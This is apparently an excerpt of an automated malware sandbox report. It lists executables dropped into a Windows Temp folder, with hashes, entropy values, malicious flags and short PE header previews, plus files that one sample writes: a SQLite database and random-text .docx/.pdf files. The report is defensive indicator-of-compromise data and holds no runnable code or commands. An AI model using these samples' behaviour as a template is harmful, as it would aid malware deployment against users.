                                                                                                                                                                                                        SHA-512:5B0857A7F0C5709DC83AE1BA997E6604F16241DF6FC1D9E9C36CD2B7B306C30FDA0FF54630ECF658DA03B68DA03508BD4B5C617912D66A15FD239B651AC0A2F8
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................................C..........R..........................Rich............PE..L...15.`.................>...........+.......P....@.................................*(......................................<;..(.......`....................P..,#..`............................... ...@............................................text...n<.......>.................. ..`.data...H%...P.......B..............@....lave................X..............@....fidoce.K............Z..............@....pihudu..............\..............@....lafog...............^..............@....rsrc...`............l..............@..@.reloc...>...P...@..................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\1B15.exe
                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):816128
                                                                                                                                                                                                        Entropy (8bit):7.441400608749297
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24576:LIf1GQIfOzkechO5QhGRBQPcnUdvs5ubra:0tGPfOzrcogEnYvK
                                                                                                                                                                                                        MD5:D8B78E7D4D822C10CCE3654D7F9E4931
                                                                                                                                                                                                        SHA1:355A02E87F393AAE822C89F54B7A26187B889A19
                                                                                                                                                                                                        SHA-256:77F8245BB300970C5D60F028BC2E084BAB3B3464FDAC14094A94E47FAA6A08B1
                                                                                                                                                                                                        SHA-512:03749AC5D0238898987C4FFE4799307C612A9912F8FD9B182A700E933D0BB72E8F2201689F3DF836ABFCAA02BAA7F3D4903B99A2C739E01C9A3B1F0587E0E1B7
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............w...w...w.......w......w..C....w...v.W.w......w.......w.......w.Rich..w.........................PE..L......_..........................................@.................................jh......................................l...(.......h.......................4#..P...............................h...@............................................text...\........................... ..`.data...............................@....nulec..............................@....pexano.K...........................@....tufeh..............................@....rijeyo.............................@....rsrc...h...........................@..@.reloc...B.......D...0..............@..B........................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\2757.exe
                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                        File Type:MS-DOS executable
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1497920
                                                                                                                                                                                                        Entropy (8bit):7.935012575598995
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24576:Z5o4ghlDlYMi1GJTGINb/yvUZmBoq7m2PM0IGyo2lgqeDW0F0dj71O6+iIzsbEjp:iDlhi1SGIpyvfoeV2KWK0d/g9vzsbE1
                                                                                                                                                                                                        MD5:67B848B139E584BF3361A51160FC6731
                                                                                                                                                                                                        SHA1:0D8C86D200BD19973F7DC833CA8809D8E60B8854
                                                                                                                                                                                                        SHA-256:B8B942C702F57D78578F42ABAA04906A42BB09C8C88731E71B9509A5509AAE2F
                                                                                                                                                                                                        SHA-512:EB8E57175BB33FEC20D375C6A85446ED51C0EEEEFCB8B01FC1B0C941D2DA52BBCD1ED9080BE67F4A51C2A0EA73C5B06E60A5B7AA1A5E3EAD7293E35831C5CFC0
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ.....o...g.'.:.(3...32.....f.....C'B{b.........+..R...d:.....Q..............................................................................................................................................................................................PE..L......a.....................H.......`*......@....@...........................+......^....@...................................%.P.....%..............................................................................................................reloc....%............................`.itext........%.....................@....rsrc.........%.i...................@..@.rdata.......`*.}}..................@.....................................................................................................................................................................................................................................................................................................................(.%..z..~E..V..9.Rt..a....1.:.
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\28C2.exe
                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):783872
                                                                                                                                                                                                        Entropy (8bit):6.576079323203091
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12288:WfZoHSPPvc9PU6ynVQQTUnAD5MRJSa7V7m3rjY:UrviAVvEC5CJSa7V7Srs
                                                                                                                                                                                                        MD5:F111EE7C9F26F50F9EFEEB6EF6C32A3C
                                                                                                                                                                                                        SHA1:B4239A2662A2835F8BFF098D0F0CBD4A51095144
                                                                                                                                                                                                        SHA-256:5F1E42B60BBB3EB1BB895C9A94886A775312F0AB8527B96187F9E084A08413B4
                                                                                                                                                                                                        SHA-512:973D51072EB6C4F18691E33B70187F34B7032A17AAD7575EFAC06A34009ADD3934A01261F9540FDF4A4F9429A4421E730DE947BE817C52D32FF95B83C711F04D
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............p.O.p.O.p.O."hO.p.O."yO.p.O."oO.p.O...O.p.O.p.O.p.O."fO.p.O."xO.p.O."}O.p.ORich.p.O................PE..L...@._`.................0....?.....]........@....@...........................K.............................................|X..<....pJ..............................A..............................xT..@............@..@............................text..../.......0.................. ..`.rdata.......@... ...4..............@..@.data.....>..`.......T..............@....wibobahr....`J......f..............@..@.rsrc........pJ......j..............@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\2997.exe
                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):358912
                                                                                                                                                                                                        Entropy (8bit):6.278717191933335
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:7e+RhbrOOFh9v2Y8zBk3L3gXO1RdFggj:7e6aOFhB8zBk3L3b1R
                                                                                                                                                                                                        MD5:1F935BFFF0F8128972BC69625E5B2A6C
                                                                                                                                                                                                        SHA1:18DB55C519BBE14311662A06FAEECC97566E2AFD
                                                                                                                                                                                                        SHA-256:2BFA0884B172C9EAFF7358741C164F571F0565389AB9CF99A8E0B90AE8AD914D
                                                                                                                                                                                                        SHA-512:2C94C1EA43B008CE164D7CD22A2D0FF3B60A623017007A2F361BDFF69ED72E97B0CC0897590BE9CC56333E014CD003786741EB6BB7887590CB2AAD832EA8A32D
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......k..S/.../.../...1.Z.=...1.L.W....6..*.../.......1.K.....1.[.....1.^.....Rich/...................PE..L...t..`.................<...J.......4.......P....@.................................A.......................................,9..<....0...Y.......................#..P...............................X...@............................................text...4:.......<.................. ..`.data...`....P.......@..............@....pamicak............................@....dos....K...........................@....modav..............................@....nugirof..... ......................@....rsrc....Y...0...Z..................@..@.reloc...>.......@...:..............@..B................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\315E.exe
                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1531904
                                                                                                                                                                                                        Entropy (8bit):7.9884438553546415
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24576:ojJwQQzNL/zYGLw/6xjcjLkCKMglDhkwgmvd6Y0nJWmHIlG7kEaHNYK3o0:o3QzBYX/6qnjKMgl9kwgmV6YgolG7Naf
                                                                                                                                                                                                        MD5:4FB3361FFC7E5DD2FAD4413866DB6D2E
                                                                                                                                                                                                        SHA1:067B41BD44034FF7638E4DEE36C14F2A7D0FD460
                                                                                                                                                                                                        SHA-256:DB0D62482F5E1D8A2E1732604D43A74D9641D4F56E7D14492560BB2CE76C7D33
                                                                                                                                                                                                        SHA-512:EE432B3BD1A0BA968CD3DDCAFA79A778D1C0E52C1630670AEE57519ED43C06E8CF236A0E3E948278F658A1BBECD6A955D55BD430A84EABC9C6DF823C21F2070D
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......>..$zy.wzy.wzy.wn..vwy.wn..v.y.wn..vly.w(..vky.w(..vny.w(..v0y.wn..v.y.wzy.w$y.w...v{y.w...w{y.w...v{y.wRichzy.w........................PE..L......a.................$...................@....@...........................2.......+.....................................|.-......P....................................................................................................................... ..........................@................0......................@................@...b...&..............@............ ...0......................@....rsrc........P......................@............ ...........0..............@................ .......F..............@.............(..0...r...H..............@....7w0DPA1......-.....................@....adata........2......`..............@...........................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\4187.exe
                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):760832
                                                                                                                                                                                                        Entropy (8bit):7.455489986534232
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12288:NmnQAJTFOZULSeNYKa+0R7sGtakDxKUXjE9woqT4lYf9icr/PIokJVd074tFEZ1i:NqQcBOZv8YKlksGcgUUTEGBcenr/gJVM
                                                                                                                                                                                                        MD5:C085684DB882063C21F18D251679B0CC
                                                                                                                                                                                                        SHA1:2B5E71123ABDB276913E4438AD89F4ED1616950A
                                                                                                                                                                                                        SHA-256:CDA92BB8E0734752DC6366275020CE48D75F95D78AF9793B40512895ECD2D470
                                                                                                                                                                                                        SHA-512:8158AA6D5A6D2130B711671D3DAC1A335B01D08118FB8AC91DC491ED17EE04CCA8559B634EDD4C03DECBD8278709AD70DB7FB0615DF73F25D42242EA4B2555B7
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z8~R>Y..>Y..>Y.. ...,Y.. ...FY....k.;Y..>Y...Y.. ...~Y.. ...?Y.. ...?Y..Rich>Y..........PE..L......`.................l...<.......g............@..........................PH.....e.......................................$j..<....0...Y....................H..#..@...................................@............................................text....j.......l.................. ..`.data...h............p..............@....johac....... ......................@....rsrc.....;..0...Z..................@..@.reloc..tB....H..D...X..............@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\4583.exe
                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):453632
                                                                                                                                                                                                        Entropy (8bit):5.066707207289782
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:hmDsLlCSV7TXJnlGsMbRA9Zjhdlzi/1eY5jHDdesUXztjqO4pHh8OMjKy23AF+Yz:wQLlCSVHxlvZ9ZjufjUDH4p2kYFhvBB
                                                                                                                                                                                                        MD5:11124BB02075AD2D9D750343B42F932A
                                                                                                                                                                                                        SHA1:9BEAA5B27E610A92DF153E4B5628E1804CAD2B20
                                                                                                                                                                                                        SHA-256:00E365FB7DA89657B15CA8B16273B3B30FE66DBBEDE7F52B678D2E37AF51FA19
                                                                                                                                                                                                        SHA-512:C92123280F5C696ACA446306512293DB636D9BD70D359C4EA1F416AB192B19BF0478590076C71D6E57E72D1FE6AAE9E365792B2F223FC83F09004933C2552B07
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............q.O.q.O.q.O.#hO.q.O.#yO.q.O.#oO.q.O...O.q.O.q.O.q.O.#fO.q.O.#xO.q.O.#}O.q.ORich.q.O........PE..L....=K_.................(....?.....\........@....@...........................F..... ........................................W..<....pE. ............................A...............................S..@............@..D............................text....'.......(.................. ..`.rdata.......@... ...,..............@..@.data.....>..`.......L..............@....himav..r....`E......^..............@..@.rsrc... ....pE......b..............@..@........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\4BED.exe
                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                        File Type:MS-DOS executable
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):652928
                                                                                                                                                                                                        Entropy (8bit):7.903105089614694
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12288:nvc5Q+JQWNWFrF2rkO+T2dgXPVK3F7xGV2+AQq3KVUIgIuTfE:v6ftNWprT2qXQ3FITAQiKngIuT
                                                                                                                                                                                                        MD5:DE573B83DB582FB0354CF72CBBBD7176
                                                                                                                                                                                                        SHA1:A99B01FB00D13BDB8AAF89BA84A7CB292E05B744
                                                                                                                                                                                                        SHA-256:BDEC451319F1A86616FF05A77BBCE9272DBFE1C3900E9D8C94C7FEC1AABCBDF2
                                                                                                                                                                                                        SHA-512:CB5161180F26E39BE5F506AD22F972F309E247FFEA312D0CFD6D7E89D92AC4769013C0FA11CAF3960C8B93AEC2F378A0B7FB5AEA4322E098205D27953A18F172
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ.E@......}..J$.....Ma.E.d".j..m.4.;%.X.........`.J...k.S......Q..............................................................................................................................................................................................PE..L......a.................D...........`.......`....@..........................0................ .................................L.... ...1.................................................................................................................................................`....................................@....rsrc....1... ...1..................@..@.............`..y....8..............@.....................................................................................................................................................................................................................................................................................................................+......!...L..v..J$@d.k,.. ..
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\AS2N7900
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\2757.exe
                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                        Entropy (8bit):0.698304057893793
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoIL4rtEy80:T5LLOpEO5J/Kn7U1uBoI+j
                                                                                                                                                                                                        MD5:3806E8153A55C1A2DA0B09461A9C882A
                                                                                                                                                                                                        SHA1:BD98AB2FB5E18FD94DC24BCE875087B5C3BB2F72
                                                                                                                                                                                                        SHA-256:366E8B53CE8CC27C0980AC532C2E9D372399877931AB0CEA075C62B3CB0F82BE
                                                                                                                                                                                                        SHA-512:31E96CC89795D80390432062466D542DBEA7DF31E3E8676DF370381BEDC720948085AD495A735FBDB75071DE45F3B8E470D809E863664990A79DEE8ADC648F1C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\BJZFPPWAPT.docx
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\2757.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1026
                                                                                                                                                                                                        Entropy (8bit):4.704346314649071
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                                                                                                                                                                                        MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                                                                                                                                                                                        SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                                                                                                                                                                                        SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                                                                                                                                                                                        SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\CBA.exe
                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                        Size (bytes):539136
                                                                                                                                                                                                        Entropy (8bit):5.841944907736123
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12288:XJSPWI/m1ZNhIyNPRQSOrve+rW4mqlQbHFuYB:XJSPR0dIyNP6eNHR
                                                                                                                                                                                                        MD5:6C72997AA5DD44A44B27BD36347BAED9
                                                                                                                                                                                                        SHA1:A1EE2A54095F7ECD8DC3AFAF9BCE96543EB7BB41
                                                                                                                                                                                                        SHA-256:5261F20B37DA1A726D4E5A632A93F0DB4EA8EDA81EE3095E2ECF80DDB5B89DA2
                                                                                                                                                                                                        SHA-512:16DDFE0F81DE4F29832016D9DAD432816CABA2C778A780B763A1840EDCCCB3BE21B47ABAE8E59543FCAE0CF1300B2EDE139A0850CF7AEB0F23CC2A02FDDEACB9
                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....[;...............0..2...........O... ...`....@.. ....................................@..................................O..K....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@....reloc...............8..............@..B.................O......H............E...........Z..l............................................(....*..0..1.......8....*(g...8.....~....u....s....z&8.........8................!..........*.......*....(g...(....*...j*.......*.......*.......*.......*.......*....(....*.~(....(a...8....*(.........8........*.......*.......*.......*.......*....0.............*.0.............*....*.......*.......*.......*....(....*..0.............*....*....0.............*.(....t.A.........t.A.......................*.......
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\DUUDTUBZFW.docx
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\2757.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1026
                                                                                                                                                                                                        Entropy (8bit):4.701195573484743
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                                                                                                                                                                                                        MD5:2530C45A92F347020337052A8A7D7B00
                                                                                                                                                                                                        SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                                                                                                                                                                                                        SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                                                                                                                                                                                                        SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\DUUDTUBZFW.pdf
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\2757.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1026
                                                                                                                                                                                                        Entropy (8bit):4.701195573484743
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                                                                                                                                                                                                        MD5:2530C45A92F347020337052A8A7D7B00
                                                                                                                                                                                                        SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                                                                                                                                                                                                        SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                                                                                                                                                                                                        SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                        Preview: DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\EIVQSAOTAQ.pdf
                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\2757.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1026
                                                                                                                                                                                                        Entropy (8bit):4.692024230831571
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:RXklo22NBtmSOCPX4hQpKZCuvImjwxwo1:v22NBtxOCYQ0EuwmMxz
                                                                                                                                                                                                        MD5:086908C2D2FAA8C9284EAB6D70682A47
                                                                                                                                                                                                        SHA1:1BCA47E5FFEC5FD3CE416A922BC3F905C8FE27C4
                                                                                                                                                                                                        SHA-256:40C76F418FBB2A515AF4DEC81E501CEB725FD4C916D50FCA1A82B9F5ABC1DCCF
                                                                                                                                                                                                        SHA-512:02C48E3CDA1DC748CD3F30B2384D515B50C1DFD63651554AD3D4562B1A47F5446098DCED47A0766D184DDB30B3F158ABEC5877C9CA28AB191CEBB0782C26B230
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:unknown
